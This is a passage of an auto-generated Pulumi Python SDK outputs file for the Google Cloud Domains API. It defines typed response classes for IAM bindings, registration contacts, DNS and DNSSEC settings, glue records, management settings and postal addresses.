:param Sequence[str] members: Specifies the principals requesting access for a Cloud Platform resource. `members` can have the following values: * `allUsers`: A special identifier that represents anyone who is on the internet; with or without a Google account. * `allAuthenticatedUsers`: A special identifier that represents anyone who is authenticated with a Google account or a service account. * `user:{emailid}`: An email address that represents a specific Google account. For example, `alice@example.com` . * `serviceAccount:{emailid}`: An email address that represents a service account. For example, `my-other-app@appspot.gserviceaccount.com`. * `group:{emailid}`: An email address that represents a Google group. For example, `admins@example.com`. * `deleted:user:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a user that has been recently deleted. For example, `alice@example.com?uid=123456789012345678901`. If the user is recovered, this value reverts to `user:{emailid}` and the recovered user retains the role in the binding. * `deleted:serviceAccount:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a service account that has been recently deleted. For example, `my-other-app@appspot.gserviceaccount.com?uid=123456789012345678901`. If the service account is undeleted, this value reverts to `serviceAccount:{emailid}` and the undeleted service account retains the role in the binding. * `deleted:group:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a Google group that has been recently deleted. For example, `admins@example.com?uid=123456789012345678901`. If the group is recovered, this value reverts to `group:{emailid}` and the recovered group retains the role in the binding. * `domain:{domain}`: The G Suite domain (primary) that represents all the users of that domain. For example, `google.com` or `example.com`.
:param str role: Role that is assigned to the list of `members`, or principals. For example, `roles/viewer`, `roles/editor`, or `roles/owner`.
"""
pulumi.set(__self__, "condition", condition)
pulumi.set(__self__, "members", members)
pulumi.set(__self__, "role", role)
@property
@pulumi.getter
def condition(self) -> 'outputs.ExprResponse':
"""
The condition that is associated with this binding. If the condition evaluates to `true`, then this binding applies to the current request. If the condition evaluates to `false`, then this binding does not apply to the current request. However, a different role binding might grant the same role to one or more of the principals in this binding. To learn which resources support conditions in their IAM policies, see the [IAM documentation](https://cloud.google.com/iam/help/conditions/resource-policies).
"""
return pulumi.get(self, "condition")
@property
@pulumi.getter
def members(self) -> Sequence[str]:
"""
Specifies the principals requesting access for a Cloud Platform resource. `members` can have the following values: * `allUsers`: A special identifier that represents anyone who is on the internet; with or without a Google account. * `allAuthenticatedUsers`: A special identifier that represents anyone who is authenticated with a Google account or a service account. * `user:{emailid}`: An email address that represents a specific Google account. For example, `alice@example.com` . * `serviceAccount:{emailid}`: An email address that represents a service account. For example, `my-other-app@appspot.gserviceaccount.com`. * `group:{emailid}`: An email address that represents a Google group. For example, `admins@example.com`. * `deleted:user:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a user that has been recently deleted. For example, `alice@example.com?uid=123456789012345678901`. If the user is recovered, this value reverts to `user:{emailid}` and the recovered user retains the role in the binding. * `deleted:serviceAccount:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a service account that has been recently deleted. For example, `my-other-app@appspot.gserviceaccount.com?uid=123456789012345678901`. If the service account is undeleted, this value reverts to `serviceAccount:{emailid}` and the undeleted service account retains the role in the binding. * `deleted:group:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a Google group that has been recently deleted. For example, `admins@example.com?uid=123456789012345678901`. If the group is recovered, this value reverts to `group:{emailid}` and the recovered group retains the role in the binding. * `domain:{domain}`: The G Suite domain (primary) that represents all the users of that domain. For example, `google.com` or `example.com`.
"""
return pulumi.get(self, "members")
@property
@pulumi.getter
def role(self) -> str:
"""
Role that is assigned to the list of `members`, or principals. For example, `roles/viewer`, `roles/editor`, or `roles/owner`.
"""
return pulumi.get(self, "role")
@pulumi.output_type
class ContactResponse(dict):
"""
Details required for a contact associated with a `Registration`.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "faxNumber":
suggest = "fax_number"
elif key == "phoneNumber":
suggest = "phone_number"
elif key == "postalAddress":
suggest = "postal_address"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ContactResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ContactResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ContactResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
email: str,
fax_number: str,
phone_number: str,
postal_address: 'outputs.PostalAddressResponse'):
"""
Details required for a contact associated with a `Registration`.
:param str email: Email address of the contact.
:param str fax_number: Fax number of the contact in international format. For example, `"+1-800-555-0123"`.
:param str phone_number: Phone number of the contact in international format. For example, `"+1-800-555-0123"`.
:param 'PostalAddressResponse' postal_address: Postal address of the contact.
"""
pulumi.set(__self__, "email", email)
pulumi.set(__self__, "fax_number", fax_number)
pulumi.set(__self__, "phone_number", phone_number)
pulumi.set(__self__, "postal_address", postal_address)
@property
@pulumi.getter
def email(self) -> str:
"""
Email address of the contact.
"""
return pulumi.get(self, "email")
@property
@pulumi.getter(name="faxNumber")
def fax_number(self) -> str:
"""
Fax number of the contact in international format. For example, `"+1-800-555-0123"`.
"""
return pulumi.get(self, "fax_number")
@property
@pulumi.getter(name="phoneNumber")
def phone_number(self) -> str:
"""
Phone number of the contact in international format. For example, `"+1-800-555-0123"`.
"""
return pulumi.get(self, "phone_number")
@property
@pulumi.getter(name="postalAddress")
def postal_address(self) -> 'outputs.PostalAddressResponse':
"""
Postal address of the contact.
"""
return pulumi.get(self, "postal_address")
@pulumi.output_type
class ContactSettingsResponse(dict):
"""
Defines the contact information associated with a `Registration`. [ICANN](https://icann.org/) requires all domain names to have associated contact information. The `registrant_contact` is considered the domain's legal owner, and often the other contacts are identical.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "adminContact":
suggest = "admin_contact"
elif key == "registrantContact":
suggest = "registrant_contact"
elif key == "technicalContact":
suggest = "technical_contact"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ContactSettingsResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ContactSettingsResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ContactSettingsResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
admin_contact: 'outputs.ContactResponse',
privacy: str,
registrant_contact: 'outputs.ContactResponse',
technical_contact: 'outputs.ContactResponse'):
"""
Defines the contact information associated with a `Registration`. [ICANN](https://icann.org/) requires all domain names to have associated contact information. The `registrant_contact` is considered the domain's legal owner, and often the other contacts are identical.
:param 'ContactResponse' admin_contact: The administrative contact for the `Registration`.
:param str privacy: Privacy setting for the contacts associated with the `Registration`.
:param 'ContactResponse' registrant_contact: The registrant contact for the `Registration`. *Caution: Anyone with access to this email address, phone number, and/or postal address can take control of the domain.* *Warning: For new `Registration`s, the registrant receives an email confirmation that they must complete within 15 days to avoid domain suspension.*
:param 'ContactResponse' technical_contact: The technical contact for the `Registration`.
"""
pulumi.set(__self__, "admin_contact", admin_contact)
pulumi.set(__self__, "privacy", privacy)
pulumi.set(__self__, "registrant_contact", registrant_contact)
pulumi.set(__self__, "technical_contact", technical_contact)
@property
@pulumi.getter(name="adminContact")
def admin_contact(self) -> 'outputs.ContactResponse':
"""
The administrative contact for the `Registration`.
"""
return pulumi.get(self, "admin_contact")
@property
@pulumi.getter
def privacy(self) -> str:
"""
Privacy setting for the contacts associated with the `Registration`.
"""
return pulumi.get(self, "privacy")
@property
@pulumi.getter(name="registrantContact")
def registrant_contact(self) -> 'outputs.ContactResponse':
"""
The registrant contact for the `Registration`. *Caution: Anyone with access to this email address, phone number, and/or postal address can take control of the domain.* *Warning: For new `Registration`s, the registrant receives an email confirmation that they must complete within 15 days to avoid domain suspension.*
"""
return pulumi.get(self, "registrant_contact")
@property
@pulumi.getter(name="technicalContact")
def technical_contact(self) -> 'outputs.ContactResponse':
"""
The technical contact for the `Registration`.
"""
return pulumi.get(self, "technical_contact")
@pulumi.output_type
class CustomDnsResponse(dict):
"""
Configuration for an arbitrary DNS provider.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "dsRecords":
suggest = "ds_records"
elif key == "nameServers":
suggest = "name_servers"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in CustomDnsResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
CustomDnsResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
CustomDnsResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
ds_records: Sequence['outputs.DsRecordResponse'],
name_servers: Sequence[str]):
"""
Configuration for an arbitrary DNS provider.
:param Sequence['DsRecordResponse'] ds_records: The list of DS records for this domain, which are used to enable DNSSEC. The domain's DNS provider can provide the values to set here. If this field is empty, DNSSEC is disabled.
:param Sequence[str] name_servers: A list of name servers that store the DNS zone for this domain. Each name server is a domain name, with Unicode domain names expressed in Punycode format.
"""
pulumi.set(__self__, "ds_records", ds_records)
pulumi.set(__self__, "name_servers", name_servers)
@property
@pulumi.getter(name="dsRecords")
def ds_records(self) -> Sequence['outputs.DsRecordResponse']:
"""
The list of DS records for this domain, which are used to enable DNSSEC. The domain's DNS provider can provide the values to set here. If this field is empty, DNSSEC is disabled.
"""
return pulumi.get(self, "ds_records")
@property
@pulumi.getter(name="nameServers")
def name_servers(self) -> Sequence[str]:
"""
A list of name servers that store the DNS zone for this domain. Each name server is a domain name, with Unicode domain names expressed in Punycode format.
"""
return pulumi.get(self, "name_servers")
@pulumi.output_type
class DnsSettingsResponse(dict):
"""
Defines the DNS configuration of a `Registration`, including name servers, DNSSEC, and glue records.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "customDns":
suggest = "custom_dns"
elif key == "glueRecords":
suggest = "glue_records"
elif key == "googleDomainsDns":
suggest = "google_domains_dns"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DnsSettingsResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DnsSettingsResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DnsSettingsResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
custom_dns: 'outputs.CustomDnsResponse',
glue_records: Sequence['outputs.GlueRecordResponse'],
google_domains_dns: 'outputs.GoogleDomainsDnsResponse'):
"""
Defines the DNS configuration of a `Registration`, including name servers, DNSSEC, and glue records.
:param 'CustomDnsResponse' custom_dns: An arbitrary DNS provider identified by its name servers.
:param Sequence['GlueRecordResponse'] glue_records: The list of glue records for this `Registration`. Commonly empty.
:param 'GoogleDomainsDnsResponse' google_domains_dns: The free DNS zone provided by [Google Domains](https://domains.google/).
"""
pulumi.set(__self__, "custom_dns", custom_dns)
pulumi.set(__self__, "glue_records", glue_records)
pulumi.set(__self__, "google_domains_dns", google_domains_dns)
@property
@pulumi.getter(name="customDns")
def custom_dns(self) -> 'outputs.CustomDnsResponse':
"""
An arbitrary DNS provider identified by its name servers.
"""
return pulumi.get(self, "custom_dns")
@property
@pulumi.getter(name="glueRecords")
def glue_records(self) -> Sequence['outputs.GlueRecordResponse']:
"""
The list of glue records for this `Registration`. Commonly empty.
"""
return pulumi.get(self, "glue_records")
@property
@pulumi.getter(name="googleDomainsDns")
def google_domains_dns(self) -> 'outputs.GoogleDomainsDnsResponse':
"""
The free DNS zone provided by [Google Domains](https://domains.google/).
"""
return pulumi.get(self, "google_domains_dns")
@pulumi.output_type
class DsRecordResponse(dict):
"""
Defines a Delegation Signer (DS) record, which is needed to enable DNSSEC for a domain. It contains a digest (hash) of a DNSKEY record that must be present in the domain's DNS zone.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "digestType":
suggest = "digest_type"
elif key == "keyTag":
suggest = "key_tag"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DsRecordResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DsRecordResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DsRecordResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
algorithm: str,
digest: str,
digest_type: str,
key_tag: int):
"""
Defines a Delegation Signer (DS) record, which is needed to enable DNSSEC for a domain. It contains a digest (hash) of a DNSKEY record that must be present in the domain's DNS zone.
:param str algorithm: The algorithm used to generate the referenced DNSKEY.
:param str digest: The digest generated from the referenced DNSKEY.
:param str digest_type: The hash function used to generate the digest of the referenced DNSKEY.
:param int key_tag: The key tag of the record. Must be set in range 0 -- 65535.
"""
pulumi.set(__self__, "algorithm", algorithm)
pulumi.set(__self__, "digest", digest)
pulumi.set(__self__, "digest_type", digest_type)
pulumi.set(__self__, "key_tag", key_tag)
@property
@pulumi.getter
def algorithm(self) -> str:
"""
The algorithm used to generate the referenced DNSKEY.
"""
return pulumi.get(self, "algorithm")
@property
@pulumi.getter
def digest(self) -> str:
"""
The digest generated from the referenced DNSKEY.
"""
return pulumi.get(self, "digest")
@property
@pulumi.getter(name="digestType")
def digest_type(self) -> str:
"""
The hash function used to generate the digest of the referenced DNSKEY.
"""
return pulumi.get(self, "digest_type")
@property
@pulumi.getter(name="keyTag")
def key_tag(self) -> int:
"""
The key tag of the record. Must be set in range 0 -- 65535.
"""
return pulumi.get(self, "key_tag")
@pulumi.output_type
class ExprResponse(dict):
"""
Represents a textual expression in the Common Expression Language (CEL) syntax. CEL is a C-like expression language. The syntax and semantics of CEL are documented at https://github.com/google/cel-spec. Example (Comparison): title: "Summary size limit" description: "Determines if a summary is less than 100 chars" expression: "document.summary.size() < 100" Example (Equality): title: "Requestor is owner" description: "Determines if requestor is the document owner" expression: "document.owner == request.auth.claims.email" Example (Logic): title: "Public documents" description: "Determine whether the document should be publicly visible" expression: "document.type != 'private' && document.type != 'internal'" Example (Data Manipulation): title: "Notification string" description: "Create a notification string with a timestamp." expression: "'New message received at ' + string(document.create_time)" The exact variables and functions that may be referenced within an expression are determined by the service that evaluates it. See the service documentation for additional information.
"""
def __init__(__self__, *,
description: str,
expression: str,
location: str,
title: str):
"""
Represents a textual expression in the Common Expression Language (CEL) syntax. CEL is a C-like expression language. The syntax and semantics of CEL are documented at https://github.com/google/cel-spec. Example (Comparison): title: "Summary size limit" description: "Determines if a summary is less than 100 chars" expression: "document.summary.size() < 100" Example (Equality): title: "Requestor is owner" description: "Determines if requestor is the document owner" expression: "document.owner == request.auth.claims.email" Example (Logic): title: "Public documents" description: "Determine whether the document should be publicly visible" expression: "document.type != 'private' && document.type != 'internal'" Example (Data Manipulation): title: "Notification string" description: "Create a notification string with a timestamp." expression: "'New message received at ' + string(document.create_time)" The exact variables and functions that may be referenced within an expression are determined by the service that evaluates it. See the service documentation for additional information.
:param str description: Optional. Description of the expression. This is a longer text which describes the expression, e.g. when hovered over it in a UI.
:param str expression: Textual representation of an expression in Common Expression Language syntax.
:param str location: Optional. String indicating the location of the expression for error reporting, e.g. a file name and a position in the file.
:param str title: Optional. Title for the expression, i.e. a short string describing its purpose. This can be used e.g. in UIs that allow entering the expression.
"""
pulumi.set(__self__, "description", description)
pulumi.set(__self__, "expression", expression)
pulumi.set(__self__, "location", location)
pulumi.set(__self__, "title", title)
@property
@pulumi.getter
def description(self) -> str:
"""
Optional. Description of the expression. This is a longer text which describes the expression, e.g. when hovered over it in a UI.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def expression(self) -> str:
"""
Textual representation of an expression in Common Expression Language syntax.
"""
return pulumi.get(self, "expression")
@property
@pulumi.getter
def location(self) -> str:
"""
Optional. String indicating the location of the expression for error reporting, e.g. a file name and a position in the file.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def title(self) -> str:
"""
Optional. Title for the expression, i.e. a short string describing its purpose. This can be used e.g. in UIs that allow entering the expression.
"""
return pulumi.get(self, "title")
@pulumi.output_type
class GlueRecordResponse(dict):
"""
Defines a host on your domain that is a DNS name server for your domain and/or other domains. Glue records are a way of making the IP address of a name server known, even when it serves DNS queries for its parent domain. For example, when `ns.example.com` is a name server for `example.com`, the host `ns.example.com` must have a glue record to break the circular DNS reference.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "hostName":
suggest = "host_name"
elif key == "ipv4Addresses":
suggest = "ipv4_addresses"
elif key == "ipv6Addresses":
suggest = "ipv6_addresses"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in GlueRecordResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
GlueRecordResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
GlueRecordResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
host_name: str,
ipv4_addresses: Sequence[str],
ipv6_addresses: Sequence[str]):
"""
Defines a host on your domain that is a DNS name server for your domain and/or other domains. Glue records are a way of making the IP address of a name server known, even when it serves DNS queries for its parent domain. For example, when `ns.example.com` is a name server for `example.com`, the host `ns.example.com` must have a glue record to break the circular DNS reference.
:param str host_name: Domain name of the host in Punycode format.
:param Sequence[str] ipv4_addresses: List of IPv4 addresses corresponding to this host in the standard decimal format (e.g. `198.51.100.1`). At least one of `ipv4_address` and `ipv6_address` must be set.
:param Sequence[str] ipv6_addresses: List of IPv6 addresses corresponding to this host in the standard hexadecimal format (e.g. `2001:db8::`). At least one of `ipv4_address` and `ipv6_address` must be set.
"""
pulumi.set(__self__, "host_name", host_name)
pulumi.set(__self__, "ipv4_addresses", ipv4_addresses)
pulumi.set(__self__, "ipv6_addresses", ipv6_addresses)
@property
@pulumi.getter(name="hostName")
def host_name(self) -> str:
"""
Domain name of the host in Punycode format.
"""
return pulumi.get(self, "host_name")
@property
@pulumi.getter(name="ipv4Addresses")
def ipv4_addresses(self) -> Sequence[str]:
"""
List of IPv4 addresses corresponding to this host in the standard decimal format (e.g. `198.51.100.1`). At least one of `ipv4_address` and `ipv6_address` must be set.
"""
return pulumi.get(self, "ipv4_addresses")
@property
@pulumi.getter(name="ipv6Addresses")
def ipv6_addresses(self) -> Sequence[str]:
"""
List of IPv6 addresses corresponding to this host in the standard hexadecimal format (e.g. `2001:db8::`). At least one of `ipv4_address` and `ipv6_address` must be set.
"""
return pulumi.get(self, "ipv6_addresses")
@pulumi.output_type
class GoogleDomainsDnsResponse(dict):
"""
Configuration for using the free DNS zone provided by Google Domains as a `Registration`'s `dns_provider`. You cannot configure the DNS zone itself using the API. To configure the DNS zone, go to [Google Domains](https://domains.google/).
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "dsRecords":
suggest = "ds_records"
elif key == "dsState":
suggest = "ds_state"
elif key == "nameServers":
suggest = "name_servers"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in GoogleDomainsDnsResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
GoogleDomainsDnsResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
GoogleDomainsDnsResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
ds_records: Sequence['outputs.DsRecordResponse'],
ds_state: str,
name_servers: Sequence[str]):
"""
Configuration for using the free DNS zone provided by Google Domains as a `Registration`'s `dns_provider`. You cannot configure the DNS zone itself using the API. To configure the DNS zone, go to [Google Domains](https://domains.google/).
:param Sequence['DsRecordResponse'] ds_records: The list of DS records published for this domain. The list is automatically populated when `ds_state` is `DS_RECORDS_PUBLISHED`, otherwise it remains empty.
:param str ds_state: The state of DS records for this domain. Used to enable or disable automatic DNSSEC.
:param Sequence[str] name_servers: A list of name servers that store the DNS zone for this domain. Each name server is a domain name, with Unicode domain names expressed in Punycode format. This field is automatically populated with the name servers assigned to the Google Domains DNS zone.
"""
pulumi.set(__self__, "ds_records", ds_records)
pulumi.set(__self__, "ds_state", ds_state)
pulumi.set(__self__, "name_servers", name_servers)
@property
@pulumi.getter(name="dsRecords")
def ds_records(self) -> Sequence['outputs.DsRecordResponse']:
"""
The list of DS records published for this domain. The list is automatically populated when `ds_state` is `DS_RECORDS_PUBLISHED`, otherwise it remains empty.
"""
return pulumi.get(self, "ds_records")
@property
@pulumi.getter(name="dsState")
def ds_state(self) -> str:
"""
The state of DS records for this domain. Used to enable or disable automatic DNSSEC.
"""
return pulumi.get(self, "ds_state")
@property
@pulumi.getter(name="nameServers")
def name_servers(self) -> Sequence[str]:
"""
A list of name servers that store the DNS zone for this domain. Each name server is a domain name, with Unicode domain names expressed in Punycode format. This field is automatically populated with the name servers assigned to the Google Domains DNS zone.
"""
return pulumi.get(self, "name_servers")
@pulumi.output_type
class ManagementSettingsResponse(dict):
"""
Defines renewal, billing, and transfer settings for a `Registration`.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "renewalMethod":
suggest = "renewal_method"
elif key == "transferLockState":
suggest = "transfer_lock_state"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ManagementSettingsResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ManagementSettingsResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ManagementSettingsResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
renewal_method: str,
transfer_lock_state: str):
"""
Defines renewal, billing, and transfer settings for a `Registration`.
:param str renewal_method: The renewal method for this `Registration`.
:param str transfer_lock_state: Controls whether the domain can be transferred to another registrar.
"""
pulumi.set(__self__, "renewal_method", renewal_method)
pulumi.set(__self__, "transfer_lock_state", transfer_lock_state)
@property
@pulumi.getter(name="renewalMethod")
def renewal_method(self) -> str:
"""
The renewal method for this `Registration`.
"""
return pulumi.get(self, "renewal_method")
@property
@pulumi.getter(name="transferLockState")
def transfer_lock_state(self) -> str:
"""
Controls whether the domain can be transferred to another registrar.
"""
return pulumi.get(self, "transfer_lock_state")
@pulumi.output_type
class PostalAddressResponse(dict):
"""
Represents a postal address, e.g. for postal delivery or payments addresses. Given a postal address, a postal service can deliver items to a premise, P.O. Box or similar. It is not intended to model geographical locations (roads, towns, mountains). In typical usage an address would be created via user input or from importing existing data, depending on the type of process. Advice on address input / editing: - Use an i18n-ready address widget such as https://github.com/google/libaddressinput - Users should not be presented with UI elements for input or editing of fields outside countries where that field is used. For more guidance on how to use this schema, please see: https://support.google.com/business/answer/6397478
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "addressLines":
suggest = "address_lines"
elif key == "administrativeArea":
suggest = "administrative_area"
elif key == "languageCode":
suggest = "language_code"
elif key == "postalCode":
suggest = "postal_code"
elif key == "regionCode":
suggest = "region_code"
elif key == "sortingCode":
suggest = "sorting_code"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in PostalAddressResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
PostalAddressResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
PostalAddressResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
address_lines: Sequence[str],
administrative_area: str,
language_code: str,
locality: str,
organization: str,
postal_code: str,
recipients: Sequence[str],
region_code: str,
revision: int,
sorting_code: str,
sublocality: str):
"""
Represents a postal address, e.g. for postal delivery or payments addresses. Given a postal address, a postal service can deliver items to a premise, P.O. Box or similar. It is not intended to model geographical locations (roads, towns, mountains). In typical usage an address would be created via user input or from importing existing data, depending on the type of process. Advice on address input / editing: - Use an i18n-ready address widget such as https://github.com/google/libaddressinput - Users should not be presented with UI elements for input or editing of fields outside countries where that field is used. For more guidance on how to use this schema, please see: https://support.google.com/business/answer/6397478
:param Sequence[str] address_lines: Unstructured address lines describing the lower levels of an address. Because values in address_lines do not have type information and may sometimes contain multiple values in a single field (e.g. "Austin, TX"), it is important that the line order is clear. The order of address lines should be "envelope order" for the country/region of the address. In places where this can vary (e.g. Japan), address_language is used to make it explicit (e.g. "ja" for large-to-small ordering and "ja-Latn" or "en" for small-to-large). This way, the most specific line of an address can be selected based on the language. The minimum permitted structural representation of an address consists of a region_code with all remaining information placed in the address_lines. It would be possible to format such an address very approximately without geocoding, but no semantic reasoning could be made about any of the address components until it was at least partially resolved. Creating an address only containing a region_code and address_lines, and then geocoding is the recommended way to handle completely unstructured addresses (as opposed to guessing which parts of the address should be localities or administrative areas).
:param str administrative_area: Optional. Highest administrative subdivision which is used for postal addresses of a country or region. For example, this can be a state, a province, an oblast, or a prefecture. Specifically, for Spain this is the province and not the autonomous community (e.g. "Barcelona" and not "Catalonia"). Many countries don't use an administrative area in postal addresses. E.g. in Switzerland this should be left unpopulated.
:param str language_code: Optional. BCP-47 language code of the contents of this address (if known). This is often the UI language of the input form or is expected to match one of the languages used in the address' country/region, or their transliterated equivalents. This can affect formatting in certain countries, but is not critical to the correctness of the data and will never affect any validation or other non-formatting related operations. If this value is not known, it should be omitted (rather than specifying a possibly incorrect default). Examples: "zh-Hant", "ja", "ja-Latn", "en".
:param str locality: Optional. Generally refers to the city/town portion of the address. Examples: US city, IT comune, UK post town. In regions of the world where localities are not well defined or do not fit into this structure well, leave locality empty and use address_lines.
:param str organization: Optional. The name of the organization at the address.
:param str postal_code: Optional. Postal code of the address. Not all countries use or require postal codes to be present, but where they are used, they may trigger additional validation with other parts of the address (e.g. state/zip validation in the U.S.A.).
:param Sequence[str] recipients: Optional. The recipient at the address. This field may, under certain circumstances, contain multiline information. For example, it might contain "care of" information.
:param str region_code: CLDR region code of the country/region of the address. This is never inferred and it is up to the user to ensure the value is correct. See http://cldr.unicode.org/ and http://www.unicode.org/cldr/charts/30/supplemental/territory_information.html for details. Example: "CH" for Switzerland.
:param int revision: The schema revision of the `PostalAddress`. This must be set to 0, which is the latest revision. All new revisions **must** be backward compatible with old revisions.
:param str sorting_code: Optional. Additional, country-specific, sorting code. This is not used in most regions. Where it is used, the value is either a string like "CEDEX", optionally followed by a number (e.g. "CEDEX 7"), or just a number alone, representing the "sector code" (Jamaica), "delivery area indicator" (Malawi) or "post office indicator" (e.g. Côte d'Ivoire).
:param str sublocality: Optional. Sublocality of the address. For example, this can be neighborhoods, boroughs, districts.
"""
pulumi.set(__self__, "address_lines", address_lines)
pulumi.set(__self__, "administrative_area", administrative_area)
pulumi.set(__self__, "language_code", language_code)
pulumi.set(__self__, "locality", locality)
pulumi.set(__self__, "organization", organization)
pulumi.set(__self__, "postal_code", postal_code)
pulumi.set(__self__, "recipients", recipients)
pulumi.set(__self__, "region_code", region_code)
pulumi.set(__self__, "revision", revision)
pulumi.set(__self__, "sorting_code", sorting_code)
pulumi.set(__self__, "sublocality", sublocality)
@property
@pulumi.getter(name="addressLines")
def address_lines(self) -> Sequence[str]:
"""
Unstructured address lines describing the lower levels of an address. Because values in address_lines do not have type information and may sometimes contain multiple values in a single field (e.g. "Austin, TX"), it is important that the line order is clear. The order of address lines should be "envelope order" for the country/region of the address. In places where this can vary (e.g. Japan), address_language is used to make it explicit (e.g. "ja" for large-to-small ordering and "ja-Latn" or "en" for small-to-large). This way, the most specific line of an address can be selected based on the language. The minimum permitted structural representation of an address consists of a region_code with all remaining information placed in the address_lines. It would be possible to format such an address very approximately without geocoding, but no semantic reasoning could be made about any of the address components until it was at least partially resolved. Creating an address only containing a region_code and address_lines, and then geocoding is the recommended way to handle completely unstructured addresses (as opposed to guessing which parts of the address should be localities or administrative areas).
"""
return pulumi.get(self, "address_lines")
@property
@pulumi.getter(name="administrativeArea")
def administrative_area(self) -> str:
"""
Optional. Highest administrative subdivision which is used for postal addresses of a country or region. For example, this can be a state, a province, an oblast, or a prefecture. Specifically, for Spain this is the province and not the autonomous community (e.g. "Barcelona" and not "Catalonia"). Many countries don't use an administrative area in postal addresses. E.g. in Switzerland this should be left unpopulated.
"""
return pulumi.get(self, "administrative_area")
@property
@pulumi.getter(name="languageCode")
def language_code(self) -> str:
"""
Optional. BCP-47 language code of the contents of this address (if known). This is often the UI language of the input form or is expected to match one of the languages used in the address' country/region, or their transliterated equivalents. This can affect formatting in certain countries, but is not critical to the correctness of the data and will never affect any validation or other non-formatting related operations. If this value is not known, it should be omitted (rather than specifying a possibly incorrect default). Examples: "zh-Hant", "ja", "ja-Latn", "en".
"""
return pulumi.get(self, "language_code")
@property
@pulumi.getter
def locality(self) -> str:
"""
Optional. Generally refers to the city/town portion of the address. Examples: US city, IT comune, UK post town. In regions of the world where localities are not well defined or do not fit into this structure well, leave locality empty and use address_lines.
"""
return pulumi.get(self, "locality")
@property
@pulumi.getter
def organization(self) -> str:
"""
Optional. The name of the organization at the address.
"""
return pulumi.get(self, "organization")
@property
@pulumi.getter(name="postalCode")
def postal_code(self) -> str:
"""
Optional. Postal code of the address. Not all countries use or require postal codes to be present, but where they are used, they may trigger additional validation with other parts of the address (e.g. state/zip validation in the U.S.A.).
"""
return pulumi.get(self, "postal_code")
@property
@pulumi.getter
def recipients(self) -> Sequence[str]:
"""
Optional. The recipient at the address. This field may, under certain circumstances, contain multiline information. For example, it might contain "care of" information.
"""
return pulumi.get(self, "recipients")
@property
@pulumi.getter(name="regionCode")
def region_code(self) -> str:
"""
CLDR region code of the country/region of the address. This is never inferred and it is up to the user to ensure the value is correct. See http://cldr.unicode.org/ and http://www.unicode.org/cldr/charts/30/supplemental/territory_information.html for details. Example: "CH" for Switzerland.
"""
return pulumi.get(self, "region_code")
@property
@pulumi.getter
def revision(self) -> int:
"""
The schema revision of the `PostalAddress`. This must be set to 0, which is the latest revision. All new revisions **must** be backward compatible with old revisions.
"""
return pulumi.get(self, "revision")
@property
@pulumi.getter(name="sortingCode")
def sorting_code(self) -> str:
"""
Optional. Additional, country-specific, sorting code. This is not used in most regions. Where it is used, the value is either a string like "CEDEX", optionally followed by a number (e.g. "CEDEX 7"), or just a number alone, representing the "sector code" (Jamaica), "delivery area indicator" (Malawi) or "post office indicator" (e.g. Côte d'Ivoire).
"""
return pulumi.get(self, "sorting_code")
@property
@pulumi.getter
def sublocality(self) -> str:
"""
Optional. Sublocality of the address. For example, this can be neighborhoods, boroughs, districts.
"""
return pulumi.get(self, "sublocality")
1ea5e3bc383e39e708eeff6005f6306040d99a9c | 40,039 | py | Python |
